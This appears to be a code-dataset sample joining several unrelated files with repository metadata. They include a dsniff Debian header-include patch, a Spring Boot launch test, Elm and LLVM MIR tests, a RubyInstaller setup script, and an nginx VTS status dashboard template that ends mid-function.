--- dsniff-2.4b1+debian~/decode_aim.c 2007-06-17 16:22:39.000000000 -0300
+++ dsniff-2.4b1+debian/decode_aim.c 2007-06-17 16:26:46.000000000 -0300
@@ -14,6 +14,7 @@
#include <stdio.h>
#include <string.h>
+#include <arpa/inet.h>
#include "hex.h"
#include "buf.h"
diff -urNad dsniff-2.4b1+debian~/decode_mmxp.c dsniff-2.4b1+debian/decode_mmxp.c
--- dsniff-2.4b1+debian~/decode_mmxp.c 2007-06-17 16:22:39.000000000 -0300
+++ dsniff-2.4b1+debian/decode_mmxp.c 2007-06-17 16:26:46.000000000 -0300
@@ -21,6 +21,7 @@
#include <stdio.h>
#include <string.h>
+#include <arpa/inet.h>
#include "buf.h"
#include "decode.h"
diff -urNad dsniff-2.4b1+debian~/decode_pptp.c dsniff-2.4b1+debian/decode_pptp.c
--- dsniff-2.4b1+debian~/decode_pptp.c 2007-06-17 16:22:39.000000000 -0300
+++ dsniff-2.4b1+debian/decode_pptp.c 2007-06-17 16:26:46.000000000 -0300
@@ -16,6 +16,7 @@
#include <stdio.h>
#include <string.h>
+#include <arpa/inet.h>
#include "buf.h"
#include "decode.h"
diff -urNad dsniff-2.4b1+debian~/decode_tds.c dsniff-2.4b1+debian/decode_tds.c
--- dsniff-2.4b1+debian~/decode_tds.c 2007-06-17 16:26:46.000000000 -0300
+++ dsniff-2.4b1+debian/decode_tds.c 2007-06-17 16:26:46.000000000 -0300
@@ -19,6 +19,7 @@
#include <stdio.h>
#include <string.h>
#include <strlcat.h>
+#include <arpa/inet.h>
#include "decode.h"
diff -urNad dsniff-2.4b1+debian~/decode_vrrp.c dsniff-2.4b1+debian/decode_vrrp.c
--- dsniff-2.4b1+debian~/decode_vrrp.c 2007-06-17 16:22:39.000000000 -0300
+++ dsniff-2.4b1+debian/decode_vrrp.c 2007-06-17 16:26:46.000000000 -0300
@@ -15,6 +15,7 @@
#include <stdio.h>
#include <string.h>
+#include <arpa/inet.h>
#include "buf.h"
#include "decode.h"
diff -urNad dsniff-2.4b1+debian~/ssh.c dsniff-2.4b1+debian/ssh.c
--- dsniff-2.4b1+debian~/ssh.c 2007-06-17 16:26:46.000000000 -0300
+++ dsniff-2.4b1+debian/ssh.c 2007-06-17 16:26:46.000000000 -0300
@@ -23,6 +23,7 @@
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
+#include <arpa/inet.h>
#include <unistd.h>
#include "hex.h"
| Darcs Patch | 4 | acheong08/dsniff | debian/patches/12_arpa_inet_header.dpatch | [
"BSD-3-Clause"
] |
source ./test-functions.sh
install_service
useradd wagner
echo 'RUN_AS_USER=wagner' > /test-service/spring-boot-app.conf
useradd phil
chown phil /test-service/spring-boot-app.jar
start_service
await_app
ls -la /var/log/spring-boot-app.log
| Shell | 3 | yiou362/spring-boot-2.2.9.RELEASE | spring-boot-tests/spring-boot-integration-tests/spring-boot-launch-script-tests/src/test/resources/scripts/launch-with-run-as-user-preferred-to-jar-owner.sh | [
"Apache-2.0"
] |
stocks
load tsla
bt
whatif
whatif -n 2.34
whatif 2021-01-01
ema
ema_cross
rsi | Gosu | 2 | minhhoang1023/GamestonkTerminal | scripts/test_stocks_bt.gst | [
"MIT"
] |
(set-info :smt-lib-version 2.6)
(set-logic QF_UFLRA)
(set-info :source |CPAchecker with k-induction on SV-COMP14 program using MathSAT5, submitted by Philipp Wendler, http://cpachecker.sosy-lab.org|)
(set-info :category "industrial")
(set-info :status unsat)
(define-fun _1 () Bool true)
(define-fun _2 () Bool false)
(assert _1)
(assert _2)
(check-sat)
(exit)
| SMT | 2 | livinlife6751/infer | sledge/test/smt/QF_UFLRA/cpachecker-induction-svcomp14/cpachecker-induction.32_1_cilled_true-unreach-call_ok_nondet_linux-3.4-32_1-drivers--i2c--algos--i2c-algo-pca.ko-ldv_main0_sequence_infinite_withcheck_stateful.cil.out.c.smt2 | [
"MIT"
] |
module RequestBufferTests exposing (all)
import Common
import Dashboard.RequestBuffer exposing (Buffer(..), handleCallback, handleDelivery)
import Expect
import Message.Callback exposing (Callback(..))
import Message.Effects exposing (Effect(..))
import Message.Subscription exposing (Delivery(..), Interval(..))
import Test exposing (Test, describe, test)
import Time
all : Test
all =
describe "RequestBuffer"
[ test "auto refreshes on five-second tick after previous request finishes" <|
\_ ->
( False, [] )
|> handleCallback callback [ buffer ]
|> handleDelivery
(ClockTicked FiveSeconds <| Time.millisToPosix 0)
[ buffer ]
|> Tuple.second
|> Common.contains effect
, test "doesn't fetch until the first request finishes" <|
\_ ->
( False, [] )
|> handleDelivery
(ClockTicked FiveSeconds <| Time.millisToPosix 0)
[ buffer ]
|> Tuple.second
|> Common.notContains effect
, test "doesn't fetch until the last request finishes" <|
\_ ->
( False, [] )
|> handleCallback callback [ buffer ]
|> handleDelivery
(ClockTicked FiveSeconds <| Time.millisToPosix 0)
[ buffer ]
|> handleDelivery
(ClockTicked FiveSeconds <| Time.millisToPosix 0)
[ buffer ]
|> Tuple.second
|> Expect.equal [ effect ]
]
callback =
EmptyCallback
effect =
FetchUser
buffer : Buffer Bool
buffer =
Buffer effect
((==) callback)
(always False)
{ get = identity
, set = always
}
| Elm | 4 | Caprowni/concourse | web/elm/tests/RequestBufferTests.elm | [
"Apache-2.0"
] |
// RubyInstaller Inno Setup GUI Customizations
//
// Copyright (c) 2009-2012 Jon Maken
// Copyright (c) 2012 Yusuke Endoh
// Revision: 2012-05-28 13:58:04 -0600
// License: Modified BSD License
const
ChkBoxBaseY = 95;
ChkBoxBaseHeight = 17;
ChkBoxBaseLeft = 18;
var
PathChkBox, PathExtChkBox, TclTkChkBox: TCheckBox;
function IsAssociated(): Boolean;
begin
Result := PathExtChkBox.Checked;
end;
function IsModifyPath(): Boolean;
begin
Result := PathChkBox.Checked;
end;
function IsTclTk(): Boolean;
begin
Result := TclTkChkBox.Checked;
end;
procedure ParseSilentTasks();
var
I, N: Integer;
Param: String;
Tasks: TStringList;
begin
{* parse command line args for silent install tasks *}
for I := 0 to ParamCount do
begin
Param := AnsiUppercase(ParamStr(I));
if Pos('/TASKS', Param) <> 0 then
begin
Param := Trim(Copy(Param, Pos('=', Param) + 1, Length(Param)));
try
// TODO check for too many tasks to prevent overflow??
Tasks := StrToList(Param, ',');
for N := 0 to Tasks.Count - 1 do
case Trim(Tasks.Strings[N]) of
'ADDTK': TclTkChkBox.State := cbChecked;
'MODPATH': PathChkBox.State := cbChecked;
'ASSOCFILES': PathExtChkBox.State := cbChecked;
end;
finally
Tasks.Free;
end;
end;
end;
end;
procedure URLText_OnClick(Sender: TObject);
var
ErrorCode: Integer;
begin
if Sender is TNewStaticText then
ShellExec('open', TNewStaticText(Sender).Caption, '', '', SW_SHOWNORMAL, ewNoWait, ErrorCode);
end;
procedure InitializeWizard;
var
ChkBoxCurrentY: Integer;
Page: TWizardPage;
HostPage: TNewNotebookPage;
URLText, TmpLabel: TNewStaticText;
begin
{* Path, Tcl/Tk, and file association task check boxes *}
Page := PageFromID(wpSelectDir);
ChkBoxCurrentY := ChkBoxBaseY;
#ifndef NoTk
TclTkChkBox := TCheckBox.Create(Page);
TclTkChkBox.Parent := Page.Surface;
TclTkChkBox.State := cbUnchecked;
TclTkChkBox.Caption := CustomMessage('InstallTclTk');
TclTkChkBox.Hint := CustomMessage('InstallTclTkHint');
TclTkChkBox.ShowHint := True;
TclTkChkBox.Alignment := taRightJustify;
TclTkChkBox.Top := ScaleY(ChkBoxBaseY);
TclTkChkBox.Left := ScaleX(ChkBoxBaseLeft);
TclTkChkBox.Width := Page.SurfaceWidth;
TclTkChkBox.Height := ScaleY(ChkBoxBaseHeight);
ChkBoxCurrentY := ChkBoxCurrentY + ChkBoxBaseHeight;
#endif
PathChkBox := TCheckBox.Create(Page);
PathChkBox.Parent := Page.Surface;
PathChkBox.State := cbUnchecked;
PathChkBox.Caption := CustomMessage('AddPath');
PathChkBox.Hint := CustomMessage('AddPathHint');
PathChkBox.ShowHint := True;
PathChkBox.Alignment := taRightJustify;
PathChkBox.Top := ScaleY(ChkBoxCurrentY);
PathChkBox.Left := ScaleX(ChkBoxBaseLeft);
PathChkBox.Width := Page.SurfaceWidth;
PathChkBox.Height := ScaleY(ChkBoxBaseHeight);
ChkBoxCurrentY := ChkBoxCurrentY + ChkBoxBaseHeight;
PathExtChkBox := TCheckBox.Create(Page);
PathExtChkBox.Parent := Page.Surface;
PathExtChkBox.State := cbUnchecked;
PathExtChkBox.Caption := CustomMessage('AssociateExt');
PathExtChkBox.Hint := CustomMessage('AssociateExtHint');
PathExtChkBox.ShowHint := True;
PathExtChkBox.Alignment := taRightJustify;
PathExtChkBox.Top := ScaleY(ChkBoxCurrentY);
PathExtChkBox.Left := ScaleX(ChkBoxBaseLeft);
PathExtChkBox.Width := Page.SurfaceWidth;
PathExtChkBox.Height := ScaleY(ChkBoxBaseHeight);
{* Single Ruby installation tip message *}
TmpLabel := TNewStaticText.Create(Page);
TmpLabel.Parent := Page.Surface;
TmpLabel.Top := ScaleY(ChkBoxCurrentY + 30);
TmpLabel.Left := ScaleX(6);
TmpLabel.Width := Page.SurfaceWidth;
TmpLabel.WordWrap := True;
TmpLabel.Caption := CustomMessage('MouseoverHint');
ParseSilentTasks;
{* Labels and links back to RubyInstaller project pages *}
HostPage := WizardForm.FinishedPage;
TmpLabel := TNewStaticText.Create(HostPage);
TmpLabel.Parent := HostPage;
TmpLabel.Top := ScaleY(180);
TmpLabel.Left := ScaleX(176);
TmpLabel.AutoSize := True;
TmpLabel.Caption := CustomMessage('WebSiteLabel');
URLText := TNewStaticText.Create(HostPage);
URLText.Parent := HostPage;
URLText.Top := TmpLabel.Top;
URLText.Left := TmpLabel.Left + TmpLabel.Width + ScaleX(4);
URLText.AutoSize := True;
URLText.Caption := 'http://rubyinstaller.org';
URLText.Cursor := crHand;
URLText.Font.Color := clBlue;
URLText.OnClick := @URLText_OnClick;
TmpLabel := TNewStaticText.Create(HostPage);
TmpLabel.Parent := HostPage;
TmpLabel.Top := ScaleY(196);
TmpLabel.Left := ScaleX(176);
TmpLabel.AutoSize := True;
TmpLabel.Caption := CustomMessage('SupportGroupLabel');
URLText := TNewStaticText.Create(HostPage);
URLText.Parent := HostPage;
URLText.Top := TmpLabel.Top;
URLText.Left := TmpLabel.Left + TmpLabel.Width + ScaleX(4);
URLText.AutoSize := True;
URLText.Caption := 'http://groups.google.com/group/rubyinstaller';
URLText.Cursor := crHand;
URLText.Font.Color := clBlue;
URLText.OnClick := @URLText_OnClick;
TmpLabel := TNewStaticText.Create(HostPage);
TmpLabel.Parent := HostPage;
TmpLabel.Top := ScaleY(212);
TmpLabel.Left := ScaleX(176);
TmpLabel.AutoSize := True;
TmpLabel.Caption := CustomMessage('WikiLabel');
URLText := TNewStaticText.Create(HostPage);
URLText.Parent := HostPage;
URLText.Top := TmpLabel.Top;
URLText.Left := TmpLabel.Left + TmpLabel.Width + ScaleX(4);
URLText.AutoSize := True;
URLText.Caption := 'http://wiki.github.com/oneclick/rubyinstaller';
URLText.Cursor := crHand;
URLText.Font.Color := clBlue;
URLText.OnClick := @URLText_OnClick;
TmpLabel := TNewStaticText.Create(HostPage);
TmpLabel.Parent := HostPage;
TmpLabel.Top := ScaleY(245);
TmpLabel.Left := ScaleX(176);
TmpLabel.AutoSize := True;
TmpLabel.Caption := CustomMessage('IntroductionDevKitLabel');
TmpLabel := TNewStaticText.Create(HostPage);
TmpLabel.Parent := HostPage;
TmpLabel.Top := ScaleY(260);
TmpLabel.Left := ScaleX(176);
TmpLabel.AutoSize := True;
TmpLabel.Caption := CustomMessage('DevKitLabel');
URLText := TNewStaticText.Create(HostPage);
URLText.Parent := HostPage;
URLText.Top := TmpLabel.Top;
URLText.Left := TmpLabel.Left + TmpLabel.Width + ScaleX(4);
URLText.AutoSize := True;
URLText.Caption := 'http://rubyinstaller.org/add-ons/devkit';
URLText.Cursor := crHand;
URLText.Font.Color := clBlue;
URLText.OnClick := @URLText_OnClick;
end;
procedure CurPageChanged(CurPageID: Integer);
begin
if CurPageID = wpSelectDir then
WizardForm.NextButton.Caption := SetupMessage(msgButtonInstall);
end;
| Inno Setup | 5 | i-s-o/rubyinstaller | resources/installer/ri_gui.iss | [
"BSD-3-Clause"
] |
# NOTE: Assertions have been autogenerated by utils/update_mir_test_checks.py
# RUN: llc -O0 -mtriple=mipsel-linux-gnu -mcpu=mips32r5 -mattr=msa,+fp64 -mattr=nan2008 -run-pass=legalizer -verify-machineinstrs %s -o - | FileCheck %s -check-prefixes=P5600
--- |
define void @load_store_v16i8(<16 x i8>* %a, <16 x i8>* %b) { entry: ret void }
define void @load_store_v8i16(<8 x i16>* %a, <8 x i16>* %b) { entry: ret void }
define void @load_store_v4i32(<4 x i32>* %a, <4 x i32>* %b) { entry: ret void }
define void @load_store_v2i64(<2 x i64>* %a, <2 x i64>* %b) { entry: ret void }
define void @load_store_v4f32(<4 x float>* %a, <4 x float>* %b) { entry: ret void }
define void @load_store_v2f64(<2 x double>* %a, <2 x double>* %b) { entry: ret void }
...
---
name: load_store_v16i8
alignment: 4
tracksRegLiveness: true
body: |
bb.1.entry:
liveins: $a0, $a1
; P5600-LABEL: name: load_store_v16i8
; P5600: liveins: $a0, $a1
; P5600: [[COPY:%[0-9]+]]:_(p0) = COPY $a0
; P5600: [[COPY1:%[0-9]+]]:_(p0) = COPY $a1
; P5600: [[LOAD:%[0-9]+]]:_(<16 x s8>) = G_LOAD [[COPY1]](p0) :: (load 16 from %ir.b)
; P5600: G_STORE [[LOAD]](<16 x s8>), [[COPY]](p0) :: (store 16 into %ir.a)
; P5600: RetRA
%0:_(p0) = COPY $a0
%1:_(p0) = COPY $a1
%2:_(<16 x s8>) = G_LOAD %1(p0) :: (load 16 from %ir.b)
G_STORE %2(<16 x s8>), %0(p0) :: (store 16 into %ir.a)
RetRA
...
---
name: load_store_v8i16
alignment: 4
tracksRegLiveness: true
body: |
bb.1.entry:
liveins: $a0, $a1
; P5600-LABEL: name: load_store_v8i16
; P5600: liveins: $a0, $a1
; P5600: [[COPY:%[0-9]+]]:_(p0) = COPY $a0
; P5600: [[COPY1:%[0-9]+]]:_(p0) = COPY $a1
; P5600: [[LOAD:%[0-9]+]]:_(<8 x s16>) = G_LOAD [[COPY1]](p0) :: (load 16 from %ir.b)
; P5600: G_STORE [[LOAD]](<8 x s16>), [[COPY]](p0) :: (store 16 into %ir.a)
; P5600: RetRA
%0:_(p0) = COPY $a0
%1:_(p0) = COPY $a1
%2:_(<8 x s16>) = G_LOAD %1(p0) :: (load 16 from %ir.b)
G_STORE %2(<8 x s16>), %0(p0) :: (store 16 into %ir.a)
RetRA
...
---
name: load_store_v4i32
alignment: 4
tracksRegLiveness: true
body: |
bb.1.entry:
liveins: $a0, $a1
; P5600-LABEL: name: load_store_v4i32
; P5600: liveins: $a0, $a1
; P5600: [[COPY:%[0-9]+]]:_(p0) = COPY $a0
; P5600: [[COPY1:%[0-9]+]]:_(p0) = COPY $a1
; P5600: [[LOAD:%[0-9]+]]:_(<4 x s32>) = G_LOAD [[COPY1]](p0) :: (load 16 from %ir.b)
; P5600: G_STORE [[LOAD]](<4 x s32>), [[COPY]](p0) :: (store 16 into %ir.a)
; P5600: RetRA
%0:_(p0) = COPY $a0
%1:_(p0) = COPY $a1
%2:_(<4 x s32>) = G_LOAD %1(p0) :: (load 16 from %ir.b)
G_STORE %2(<4 x s32>), %0(p0) :: (store 16 into %ir.a)
RetRA
...
---
name: load_store_v2i64
alignment: 4
tracksRegLiveness: true
body: |
bb.1.entry:
liveins: $a0, $a1
; P5600-LABEL: name: load_store_v2i64
; P5600: liveins: $a0, $a1
; P5600: [[COPY:%[0-9]+]]:_(p0) = COPY $a0
; P5600: [[COPY1:%[0-9]+]]:_(p0) = COPY $a1
; P5600: [[LOAD:%[0-9]+]]:_(<2 x s64>) = G_LOAD [[COPY1]](p0) :: (load 16 from %ir.b)
; P5600: G_STORE [[LOAD]](<2 x s64>), [[COPY]](p0) :: (store 16 into %ir.a)
; P5600: RetRA
%0:_(p0) = COPY $a0
%1:_(p0) = COPY $a1
%2:_(<2 x s64>) = G_LOAD %1(p0) :: (load 16 from %ir.b)
G_STORE %2(<2 x s64>), %0(p0) :: (store 16 into %ir.a)
RetRA
...
---
name: load_store_v4f32
alignment: 4
tracksRegLiveness: true
body: |
bb.1.entry:
liveins: $a0, $a1
; P5600-LABEL: name: load_store_v4f32
; P5600: liveins: $a0, $a1
; P5600: [[COPY:%[0-9]+]]:_(p0) = COPY $a0
; P5600: [[COPY1:%[0-9]+]]:_(p0) = COPY $a1
; P5600: [[LOAD:%[0-9]+]]:_(<4 x s32>) = G_LOAD [[COPY1]](p0) :: (load 16 from %ir.b)
; P5600: G_STORE [[LOAD]](<4 x s32>), [[COPY]](p0) :: (store 16 into %ir.a)
; P5600: RetRA
%0:_(p0) = COPY $a0
%1:_(p0) = COPY $a1
%2:_(<4 x s32>) = G_LOAD %1(p0) :: (load 16 from %ir.b)
G_STORE %2(<4 x s32>), %0(p0) :: (store 16 into %ir.a)
RetRA
...
---
name: load_store_v2f64
alignment: 4
tracksRegLiveness: true
body: |
bb.1.entry:
liveins: $a0, $a1
; P5600-LABEL: name: load_store_v2f64
; P5600: liveins: $a0, $a1
; P5600: [[COPY:%[0-9]+]]:_(p0) = COPY $a0
; P5600: [[COPY1:%[0-9]+]]:_(p0) = COPY $a1
; P5600: [[LOAD:%[0-9]+]]:_(<2 x s64>) = G_LOAD [[COPY1]](p0) :: (load 16 from %ir.b)
; P5600: G_STORE [[LOAD]](<2 x s64>), [[COPY]](p0) :: (store 16 into %ir.a)
; P5600: RetRA
%0:_(p0) = COPY $a0
%1:_(p0) = COPY $a1
%2:_(<2 x s64>) = G_LOAD %1(p0) :: (load 16 from %ir.b)
G_STORE %2(<2 x s64>), %0(p0) :: (store 16 into %ir.a)
RetRA
...
| Mirah | 3 | medismailben/llvm-project | llvm/test/CodeGen/Mips/GlobalISel/legalizer/load_store_vec.mir | [
"Apache-2.0"
] |
sleep 1
t app led_count 0
sleep 1
t app led red_back on
| AGS Script | 1 | waltersgrey/autoexechack | TurnOnAndLED/Back-led/Hero3PlusBlack/autoexec.ash | [
"MIT"
] |
<%@ page contentType="text/html; charset=utf-8"%>
<%@include file="../../report/reportTree.jsp"%>
| Java Server Pages | 1 | woozhijun/cat | cat-home/src/main/webapp/jsp/system/alarm/alarm.jsp | [
"Apache-2.0"
] |
{#
# Copyright (C) 2017-2018 Fabian Franz
# Copyright (C) 2015 YoungJoo.Kim <vozltx@gmail.com>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES,
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY
# AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#}
<script src="{{ cache_safe('/ui/js/nginx/lib/lodash.min.js') }}"></script>
<script src="{{ cache_safe('/ui/js/nginx/lib/backbone-min.js') }}"></script>
<link rel="stylesheet" href="{{ cache_safe('/ui/css/nginx/vts.css') }}" type="text/css" />
<div id="update" class="update">
<strong>{{ lang._('Update Interval:') }}</strong>
<select id="refresh">
<option value="1">1</option>
<option value="2">2</option>
<option value="3">3</option>
<option value="4">4</option>
<option value="5">5</option>
<option value="6">6</option>
<option value="7">7</option>
<option value="8">8</option>
</select>
<strong>{{ lang._('Seconds') }}</strong>
</div>
<div id="monitor"></div>
<script>
function DataPoint() {
this.data = [];
this.msec = {
last: undefined,
period: undefined
};
}
DataPoint.prototype.getValue = function(key, value) {
if (typeof this.data[key] === 'undefined') {
this.data[key] = value;
return 'n/a';
} else {
const increase = value - this.data[key];
this.data[key] = value;
return Math.floor(increase * 1000 / this.msec.period);
}
};
DataPoint.prototype.refresh = function(time) {
this.msec.period = time - this.msec.last;
this.msec.last = time;
};
const UpstreamModel = Backbone.Model.extend({
idAttribute: 'uuid'
});
const UpstreamCollection = Backbone.Collection.extend({
url: '/api/nginx/settings/searchupstream',
model: UpstreamModel,
parse: function(response) {
return response.rows;
},
getByInternalName(name) {
name = name.replace('upstream', ''); // remove prefix
const len = [8, 4, 4, 4, 12];
let idx = 0;
const parts = [];
len.forEach(function (l) {
parts.push(name.substring(idx, idx + l));
idx += l;
});
const uuid = parts.join("-");
return this.get(uuid);
}
});
const uc = new UpstreamCollection();
uc.fetch();
const vtsStatusURI = "/api/nginx/service/vts";
let vtsUpdateInterval = 1000, vtsUpdate;
const vtsStatusVars = {
titles: {
main:"{{ lang._('Server main') }}",
server:"{{ lang._('Server zones') }}",
filter:"{{ lang._('Filters') }}",
upstream:"{{ lang._('Upstreams') }}",
cache:"{{ lang._('Caches') }}"
},
ids: {
main:"mainZones",
server:"serverZones",
filter:"filterZones",
upstream:"upstreamZones",
cache:"cacheZones"
}
};
const aPs = new DataPoint();
function formatTime(msec) {
const ms = 1000, m = 60, h = m * m, d = h * 24;
let s = '';
if (msec < ms) {
return msec + 'ms';
}
if (msec < (ms * m)) {
return Math.floor(msec / ms) + '.' + Math.floor((msec % ms) / 10) + 's';
}
const days = Math.floor(msec / (d * ms));
if (days) {
s += days + "d ";
}
const hours = Math.floor((msec % (d * ms)) / (h * ms));
if (days || hours) {
s += hours + "h ";
}
const minutes = Math.floor(((msec % (d * ms)) % (h * ms)) / (m * ms));
if (days || hours || minutes) {
s += minutes + "m ";
}
const seconds = Math.floor((((msec % (d * ms)) % (h * ms)) % (m * ms)) / ms);
return s + seconds + "s";
}
function formatAvailability(b,d) {
if (!b && !d) {
return "up";
} else if (d) {
return "down";
} else {
return "backup";
}
}
function htmlTag(t, v) {
const ts = t.split(' ');
return `<${t}>${v}</${ts[0]}>`;
}
function aHe(t, v) {
let o = '';
if (Array.isArray(v)) {
for (let i = 0; i < v.length; i++) {
o += htmlTag(t, v[i]);
}
} else {
o = htmlTag(t, v);
}
return o;
}
function templateServerHeader(cache) {
const heads = [];
heads[0] = aHe('th rowspan="2"', "{{ lang._('Zone') }}") +
aHe('th colspan="3"', "{{ lang._('Requests') }}") +
aHe('th colspan="6"', "{{ lang._('Responses') }}") +
aHe('th colspan="4"', "{{ lang._('Traffic') }}");
if (cache) {
heads[0] += aHe('th colspan="9"', "{{ lang._('Cache') }}");
}
heads[1] = aHe('th', [ "{{ lang._('Total') }}",
"{{ lang._('Req/s') }}",
"{{ lang._('Time') }}",
"{{ lang._('1xx') }}",
"{{ lang._('2xx') }}",
"{{ lang._('3xx') }}",
"{{ lang._('4xx') }}",
"{{ lang._('5xx') }}",
"{{ lang._('Total') }}",
"{{ lang._('Sent') }}",
"{{ lang._('Rcvd') }}",
"{{ lang._('Sent/s') }}",
"{{ lang._('Rcvd/s') }}" ]);
if (cache) {
heads[1] += aHe('th', [ "{{ lang._('Miss') }}",
"{{ lang._('Bypass') }}",
"{{ lang._('Expired') }}",
"{{ lang._('Stale') }}",
"{{ lang._('Updating') }}",
"{{ lang._('Revalidated') }}",
"{{ lang._('Hit') }}",
"{{ lang._('Scarce') }}",
"{{ lang._('Total') }}" ]);
}
return aHe('thead', aHe('tr', heads[0]) + aHe('tr', heads[1]));
}
function templateUpstreamHeader() {
const heads = [];
heads[0] = aHe('th rowspan="2"', "{{ lang._('Server') }}") +
aHe('th rowspan="2"', "{{ lang._('State') }}") +
aHe('th rowspan="2"', "{{ lang._('Response Time') }}") +
aHe('th rowspan="2"', "{{ lang._('Weight') }}") +
aHe('th rowspan="2"', "{{ lang._('MaxFails') }}") +
aHe('th rowspan="2"', "{{ lang._('FailTimeout') }}") +
aHe('th colspan="3"', "{{ lang._('Requests') }}") +
aHe('th colspan="6"', "{{ lang._('Responses') }}") +
aHe('th colspan="4"', "{{ lang._('Traffic') }}");
heads[1] = aHe('th', [ "{{ lang._('Total') }}",
"{{ lang._('Req/s') }}",
"{{ lang._('Time') }}",
"{{ lang._('1xx') }}",
"{{ lang._('2xx') }}",
"{{ lang._('3xx') }}",
"{{ lang._('4xx') }}",
"{{ lang._('5xx') }}",
"{{ lang._('Total') }}",
"{{ lang._('Sent') }}",
"{{ lang._('Rcvd') }}",
"{{ lang._('Sent/s') }}",
"{{ lang._('Rcvd/s') }}" ]);
return aHe('thead', aHe('tr', heads[0]) + aHe('tr', heads[1]));
}
function templateCacheHeader() {
var heads = [];
heads[0] = aHe('th rowspan="2"', 'Zone') +
aHe('th colspan="2"', "{{ lang._('Size') }}") +
aHe('th colspan="4"', "{{ lang._('Traffic') }}") +
aHe('th colspan="9"', "{{ lang._('Cache') }}");
heads[1] = aHe('th', [ "{{ lang._('Capacity') }}",
"{{ lang._('Used') }}",
"{{ lang._('Sent') }}",
"{{ lang._('Rcvd') }}",
"{{ lang._('Sent/s') }}",
"{{ lang._('Rcvd/s') }}",
"{{ lang._('Miss') }}",
"{{ lang._('Bypass') }}",
"{{ lang._('Expired') }}",
"{{ lang._('Stale') }}",
"{{ lang._('Updating') }}",
"{{ lang._('Revalidated') }}",
"{{ lang._('Hit') }}",
"{{ lang._('Scarce') }}",
"{{ lang._('Total') }}" ]);
return aHe('thead', aHe('tr', heads[0]) + aHe('tr', heads[1]));
}
function templateMainZone(it) {
let o, head, body;
const heads = [];
const bodys = [];
heads[0] = aHe('th rowspan="2"', "{{ lang._('Host') }}") +
aHe('th rowspan="2"', "{{ lang._('Version') }}") +
aHe('th rowspan="2"', "{{ lang._('Uptime') }}") +
aHe('th colspan="4"', "{{ lang._('Connections') }}") +
aHe('th colspan="4"', "{{ lang._('Requests') }}") +
aHe('th colspan="4"', "{{ lang._('Shared memory') }}");
heads[1] = aHe('th', [ "{{ lang._('active') }}",
"{{ lang._('reading') }}",
"{{ lang._('writing') }}",
"{{ lang._('waiting') }}",
"{{ lang._('accepted') }}",
"{{ lang._('handled') }}",
"{{ lang._('Total') }}",
"{{ lang._('Req/s') }}",
"{{ lang._('name') }}",
"{{ lang._('max Size') }}",
"{{ lang._('used Size') }}",
"{{ lang._('used Node') }}" ]);
head = aHe('thead', aHe('tr', heads[0]) + aHe('tr', heads[1]));
bodys[0] = aHe('td', [ aHe('strong', it.hostName), it.nginxVersion, formatTime(it.nowMsec - it.loadMsec),
it.connections.active, it.connections.reading, it.connections.writing,
it.connections.waiting, it.connections.accepted, it.connections.handled,
it.connections.requests, aPs.getValue('main.connections.requests', it.connections.requests),
aHe('strong', it.sharedZones.name), byteFormat(it.sharedZones.maxSize), byteFormat(it.sharedZones.usedSize),
it.sharedZones.usedNode]);
body = aHe('tbody', aHe('tr', bodys[0]));
o = aHe('h2', vtsStatusVars.titles.main) + aHe('table', `${head}${body}`);
o = aHe(`div id="${vtsStatusVars.ids.main}"`, o);
return o;
}
function templateServerZone(filter, group, id, cache) {
let n = 0, s, o = '';
for(const name in filter) {
if (filter.hasOwnProperty(name)) {
const zone = filter[name];
const uniq = `${id}.${group}.${name}`;
let clas = '';
let flag = '';
let responseCount = 0;
let responseTotal = 0;
let cacheCount = 0;
let cacheTotal = 0;
clas = (n++ % 2) ? 'odd' : '';
flag = (group.indexOf("country") !== -1 && name.length === 2)
? `<img class="flag flag-${name.toLowerCase()}" alt="flag ${name.toLowerCase()}" />`
: '';
s = aHe('th', flag + name) +
aHe('td', [(zone.requestCounter + zone.overCounts['maxIntegerSize'] * zone.overCounts['requestCounter']),
aPs.getValue(`${uniq}.requestCounter`, zone.requestCounter), formatTime(zone.requestMsec)
]);
for(const code in zone.responses) {
if (!zone.responses.hasOwnProperty(code)) continue;
responseCount = zone.responses[code] + zone.overCounts['maxIntegerSize'] * zone.overCounts[code];
responseTotal += responseCount;
s += aHe('td', responseCount);
if(code === '5xx') break;
}
s += aHe('td', [responseTotal,
byteFormat(zone.outBytes + zone.overCounts['maxIntegerSize'] * zone.overCounts['outBytes']),
byteFormat(zone.inBytes + zone.overCounts['maxIntegerSize'] * zone.overCounts['inBytes']),
byteFormat(aPs.getValue(`${uniq}.outBytes`, zone.outBytes)),
byteFormat(aPs.getValue(`${uniq}.inBytes`, zone.inBytes))
]);
if (cache) {
let i = 0;
for(const code in zone.responses) {
if(i++ < 5) continue;
if (!zone.responses.hasOwnProperty(code)) continue;
cacheCount = (zone.responses[code] + zone.overCounts['maxIntegerSize'] * zone.overCounts[code]);
cacheTotal += cacheCount;
s += aHe('td', cacheCount);
}
s += aHe('td', cacheTotal);
}
o += aHe(`tr class="${clas}"`, s);
}
}
return o;
}
function templateUpstreamZone(filter, group, id) {
let n = 0;
let s = '';
let o = '';
while (n < filter.length) {
const peer = filter[n];
const uniq = `${id}.${group}.${peer.server}`;
let clas = '';
let responseCount = 0;
let responseTotal = 0;
clas = (n++ % 2) ? 'odd' : '';
s = aHe('th', peer.server) +
